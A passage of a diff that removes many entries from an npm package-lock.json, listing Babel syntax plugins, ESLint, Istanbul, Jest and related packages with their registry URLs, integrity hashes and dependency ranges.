"sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.12.13" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-class-static-block": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-static-block/-/plugin-syntax-class-static-block-7.14.5.tgz", - "integrity": "sha512-b+YyPmr6ldyNnM6sqYeMWE+bgJcJpO6yS4QD7ymxgH34GBPNDM/THBh8iunyvKIZztiwLH4CJZ0RxTk9emgpjw==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-import-attributes": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-attributes/-/plugin-syntax-import-attributes-7.26.0.tgz", - "integrity": "sha512-e2dttdsJ1ZTpi3B9UYGLw41hifAubg19AtCu/2I/F1QNVclOBr1dYpTdmdyZ84Xiz43BS/tCUkMAZNLv12Pi+A==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.25.9" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-jsx": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.25.9.tgz", - "integrity": "sha512-ld6oezHQMZsZfp6pWtbjaNDF2tiiCYYDqQszHt5VV437lewP9aSi2Of99CK0D0XB21k7FLgnLcmQKyKzynfeAA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.25.9" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-private-property-in-object": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-private-property-in-object/-/plugin-syntax-private-property-in-object-7.14.5.tgz", - "integrity": "sha512-0wVnp9dxJ72ZUJDV27ZfbSj6iHLoytYZmh3rFcxNnvsJF3ktkzLDZPy/mA17HGsaQT3/DQsWYX1f1QGWkCoVUg==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-typescript": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.25.9.tgz", - "integrity": "sha512-hjMgRy5hb8uJJjUcdWunWVcoi9bGpJp8p5Ol1229PoN6aytsLwNMgmdftO23wnCLMfVmTwZDWMPNq/D1SY60JQ==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.25.9" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/template": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.25.9.tgz", - "integrity": "sha512-9DGttpmPvIxBb/2uwpVo3dqJ+O6RooAFOS+lB+xDqoE2PVCE8nfoHMdZLpfCQRLwvohzXISPZcgxt80xLfsuwg==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.25.9", - "@babel/parser": "^7.25.9", - "@babel/types": "^7.25.9" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/traverse": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.25.9.tgz", - "integrity": "sha512-ZCuvfwOwlz/bawvAuvcj8rrithP2/N55Tzz342AkTvq4qaWbGfmCk/tKhNaV2cthijKrPAA8SRJV5WWe7IBMJw==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.25.9", - "@babel/generator": "^7.25.9", - "@babel/parser": "^7.25.9", - "@babel/template": "^7.25.9", - "@babel/types": "^7.25.9", - "debug": "^4.3.1", - "globals": "^11.1.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/traverse/node_modules/globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/types": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.26.0.tgz", - "integrity": "sha512-Z/yiTPj+lDVnF7lWeKCIJzaIkI0vYO87dMpZ4bg4TDrFe4XXLFWL1TbXU27gBP3QccxV9mZICCrnjnYlJjXHOA==", - "dev": true, - "dependencies": { - "@babel/helper-string-parser": "^7.25.9", - "@babel/helper-validator-identifier": "^7.25.9" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true - }, - "node_modules/@eslint-community/eslint-utils": { - "version": "4.4.0", - "resolved": "https://registry.npmjs.org/@eslint-community/eslint-utils/-/eslint-utils-4.4.0.tgz", - "integrity": "sha512-1/sA4dwrzBAyeUoQ6oxahHKmrZvsnLCg4RfxW3ZFGGmQkSNQPFNLV9CUEFQP1x9EYXHTo5p6xdhZM1Ne9p/AfA==", - "dev": true, - "peer": true, - "dependencies": { - "eslint-visitor-keys": "^3.3.0" - }, - "engines": { - "node": "^12.22.0 || ^14.17.0 || >=16.0.0" - }, - "peerDependencies": { - "eslint": "^6.0.0 || ^7.0.0 || >=8.0.0" - } - }, - "node_modules/@eslint-community/regexpp": { - "version": "4.5.1", - "resolved": "https://registry.npmjs.org/@eslint-community/regexpp/-/regexpp-4.5.1.tgz", - "integrity": "sha512-Z5ba73P98O1KUYCCJTUeVpja9RcGoMdncZ6T49FCUl2lN38JtCJ+3WgIDBv0AuY4WChU5PmtJmOCTlN6FZTFKQ==", - "dev": true, - "peer": true, - "engines": { - "node": "^12.0.0 || ^14.0.0 || >=16.0.0" - } - }, - "node_modules/@eslint/eslintrc": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/@eslint/eslintrc/-/eslintrc-2.1.0.tgz", - "integrity": "sha512-Lj7DECXqIVCqnqjjHMPna4vn6GJcMgul/wuS0je9OZ9gsL0zzDpKPVtcG1HaDVc+9y+qgXneTeUMbCqXJNpH1A==", - "dev": true, - "peer": true, - "dependencies": { - "ajv": "^6.12.4", - "debug": "^4.3.2", - "espree": "^9.6.0", - "globals": "^13.19.0", - "ignore": "^5.2.0", - "import-fresh": "^3.2.1", - "js-yaml": "^4.1.0", - "minimatch": "^3.1.2", - "strip-json-comments": "^3.1.1" - }, - "engines": { - "node": "^12.22.0 || ^14.17.0 || >=16.0.0" - }, - "funding": { - "url": "https://opencollective.com/eslint" - } - }, - "node_modules/@eslint/js": { - "version": "8.44.0", - "resolved": "https://registry.npmjs.org/@eslint/js/-/js-8.44.0.tgz", - "integrity": "sha512-Ag+9YM4ocKQx9AarydN0KY2j0ErMHNIocPDrVo8zAE44xLTjEtz81OdR68/cydGtk6m6jDb5Za3r2useMzYmSw==", - "dev": true, - "peer": true, - "engines": { - "node": "^12.22.0 || ^14.17.0 || >=16.0.0" - } - }, - "node_modules/@humanwhocodes/config-array": { - "version": "0.11.10", - "resolved": "https://registry.npmjs.org/@humanwhocodes/config-array/-/config-array-0.11.10.tgz", - "integrity": "sha512-KVVjQmNUepDVGXNuoRRdmmEjruj0KfiGSbS8LVc12LMsWDQzRXJ0qdhN8L8uUigKpfEHRhlaQFY0ib1tnUbNeQ==", - "dev": true, - "peer": true, - "dependencies": { - "@humanwhocodes/object-schema": "^1.2.1", - "debug": "^4.1.1", - "minimatch": "^3.0.5" - }, - "engines": { - "node": ">=10.10.0" - } - }, - "node_modules/@humanwhocodes/module-importer": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/@humanwhocodes/module-importer/-/module-importer-1.0.1.tgz", - "integrity": "sha512-bxveV4V8v5Yb4ncFTT3rPSgZBOpCkjfK0y4oVVVJwIuDVBRMDXrPyXRL988i5ap9m9bnyEEjWfm5WkBmtffLfA==", - "dev": true, - "peer": true, - "engines": { - "node": ">=12.22" - }, - "funding": { - "type": "github", - "url": "https://github.com/sponsors/nzakas" - } - }, - "node_modules/@humanwhocodes/object-schema": { - "version": "1.2.1", - "resolved": "https://registry.npmjs.org/@humanwhocodes/object-schema/-/object-schema-1.2.1.tgz", - "integrity": "sha512-ZnQMnLV4e7hDlUvw8H+U8ASL02SS2Gn6+9Ac3wGGLIe7+je2AeAOxPY+izIPJDfFDb7eDjev0Us8MO1iFRN8hA==", - "dev": true, - "peer": true - }, - "node_modules/@isaacs/cliui": { - "version": "8.0.2", - "resolved": "https://registry.npmjs.org/@isaacs/cliui/-/cliui-8.0.2.tgz", - "integrity": "sha512-O8jcjabXaleOG9DQ0+ARXWZBTfnP4WNAqzuiJK7ll44AmxGKv/J2M4TPjxjY3znBCfvBXFzucm1twdyFybFqEA==", - "dependencies": { - "string-width": "^5.1.2", - "string-width-cjs": "npm:string-width@^4.2.0", - "strip-ansi": "^7.0.1", - "strip-ansi-cjs": "npm:strip-ansi@^6.0.1", - "wrap-ansi": "^8.1.0", - "wrap-ansi-cjs": "npm:wrap-ansi@^7.0.0" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/@isaacs/cliui/node_modules/ansi-regex": { - "version": "6.1.0", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-6.1.0.tgz", - "integrity": "sha512-7HSX4QQb4CspciLpVFwyRe79O3xsIZDDLER21kERQ71oaPodF8jL725AgJMFAYbooIqolJoRLuM81SpeUkpkvA==", - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/chalk/ansi-regex?sponsor=1" - } - }, - "node_modules/@isaacs/cliui/node_modules/ansi-styles": { - "version": "6.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-6.2.1.tgz", - "integrity": "sha512-bN798gFfQX+viw3R7yrGWRqnrN2oRkEkUjjl4JNn4E8GxxbjtG3FbrEIIY3l8/hrwUwIeCZvi4QuOTP4MErVug==", - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/@isaacs/cliui/node_modules/emoji-regex": { - "version": "9.2.2", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-9.2.2.tgz", - "integrity": "sha512-L18DaJsXSUk2+42pv8mLs5jJT2hqFkFE4j21wOmgbUqsZ2hL72NsUU785g9RXgo3s0ZNgVl42TiHp3ZtOv/Vyg==" - }, - "node_modules/@isaacs/cliui/node_modules/string-width": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-5.1.2.tgz", - "integrity": "sha512-HnLOCR3vjcY8beoNLtcjZ5/nxn2afmME6lhrDrebokqMap+XbeW8n9TXpPDOqdGK5qcI3oT0GKTW6wC7EMiVqA==", - "dependencies": { - "eastasianwidth": "^0.2.0", - "emoji-regex": "^9.2.2", - "strip-ansi": "^7.0.1" - }, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/@isaacs/cliui/node_modules/strip-ansi": { - "version": "7.1.0", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-7.1.0.tgz", - "integrity": "sha512-iq6eVVI64nQQTRYq2KtEg2d2uU7LElhTJwsH4YzIHZshxlgZms/wIc4VoDQTlG/IvVIrBKG06CrZnp0qv7hkcQ==", - "dependencies": { - "ansi-regex": "^6.0.1" - }, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/chalk/strip-ansi?sponsor=1" - } - }, - "node_modules/@isaacs/cliui/node_modules/wrap-ansi": { - "version": "8.1.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-8.1.0.tgz", - "integrity": "sha512-si7QWI6zUMq56bESFvagtmzMdGOtoxfR+Sez11Mobfc7tm+VkUckk9bW2UeffTGVUbOksxmSw0AA2gs8g71NCQ==", - "dependencies": { - "ansi-styles": "^6.1.0", - "string-width": "^5.0.1", - "strip-ansi": "^7.0.1" - }, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" - } - }, - "node_modules/@isaacs/fs-minipass": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/@isaacs/fs-minipass/-/fs-minipass-4.0.1.tgz", - "integrity": "sha512-wgm9Ehl2jpeqP3zw/7mo3kRHFp5MEDhqAdwy1fTGkHAwnkGOVsgpvQhL8B5n1qlb01jV3n/bI0ZfZp5lWA1k4w==", - "dependencies": { - "minipass": "^7.0.4" - }, - "engines": { - "node": ">=18.0.0" - } - }, - "node_modules/@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, - "dependencies": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/@istanbuljs/load-nyc-config/node_modules/argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, - "dependencies": { - "sprintf-js": "~1.0.2" - } - }, - "node_modules/@istanbuljs/load-nyc-config/node_modules/find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "dependencies": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/@istanbuljs/load-nyc-config/node_modules/js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", - "dev": true, - "dependencies": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" - }, - "bin": { - "js-yaml": "bin/js-yaml.js" - } - }, - "node_modules/@istanbuljs/load-nyc-config/node_modules/locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "dependencies": { - "p-locate": "^4.1.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/@istanbuljs/load-nyc-config/node_modules/p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "dependencies": { - "p-try": "^2.0.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/@istanbuljs/load-nyc-config/node_modules/p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "dependencies": { - "p-limit": "^2.2.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/@istanbuljs/load-nyc-config/node_modules/resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/@jest/console": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.7.0.tgz", - "integrity": "sha512-5Ni4CU7XHQi32IJ398EEP4RrB8eV09sXP2ROqD4bksHrnTree52PsxvX8tpL8LvTZ3pFzXyPbNQReSN41CAhOg==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/core": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.7.0.tgz", - "integrity": "sha512-n7aeXWKMnGtDA48y8TLWJPJmLmmZ642Ceo78cYWEpiD7FzDgmNDV/GCVRorPABdXLJZ/9wzzgZAlHjXjxDHGsg==", - "dev": true, - "dependencies": { - "@jest/console": "^29.7.0", - "@jest/reporters": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.7.0", - "jest-config": "^29.7.0", - "jest-haste-map": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-resolve-dependencies": "^29.7.0", - "jest-runner": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "jest-watcher": "^29.7.0", - "micromatch": "^4.0.4", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/@jest/environment": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.7.0.tgz", - "integrity": "sha512-aQIfHDq33ExsN4jP1NWGXhxgQ/wixs60gDiKO+XVMd8Mn0NWPWgc34ZQDTb2jKaUWQ7MuwoitXAsN2XVXNMpAw==", - "dev": true, - "dependencies": { - "@jest/fake-timers": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-mock": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/expect": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.7.0.tgz", - "integrity": "sha512-8uMeAMycttpva3P1lBHB8VciS9V0XAr3GymPpipdyQXbBcuhkLQOSe8E/p92RyAdToS6ZD1tFkX+CkhoECE0dQ==", - "dev": true, - "dependencies": { - "expect": "^29.7.0", - "jest-snapshot": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/expect-utils": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.7.0.tgz", - "integrity": "sha512-GlsNBWiFQFCVi9QVSx7f5AgMeLxe9YCCs5PuP2O2LdjDAA8Jh9eX7lA1Jq/xdXw3Wb3hyvlFNfZIfcRetSzYcA==", - "dev": true, - "dependencies": { - "jest-get-type": "^29.6.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/fake-timers": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.7.0.tgz", - "integrity": "sha512-q4DH1Ha4TTFPdxLsqDXK1d3+ioSL7yL5oCMJZgDYm6i+6CygW5E5xVr/D1HdsGxjt1ZWSfUAs9OxSB/BNelWrQ==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.7.0", - "jest-mock": "^29.7.0", - "jest-util": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/globals": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.7.0.tgz", - "integrity": "sha512-mpiz3dutLbkW2MNFubUGUEVLkTGiqW6yLVTA+JbP6fI6J5iL9Y0Nlg8k95pcF8ctKwCS7WVxteBs29hhfAotzQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.7.0", - "@jest/expect": "^29.7.0", - "@jest/types": "^29.6.3", - "jest-mock": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/reporters": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.7.0.tgz", - "integrity": "sha512-DApq0KJbJOEzAFYjHADNNxAE3KbhxQB1y5Kplb5Waqw6zVbuWatSnMjE5gs8FUgEPmNsnZA3NCWl9NG0ia04Pg==", - "dev": true, - "dependencies": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@jridgewell/trace-mapping": "^0.3.18", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^6.0.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "jest-worker": "^29.7.0", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/@jest/schemas": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.3.tgz", - "integrity": 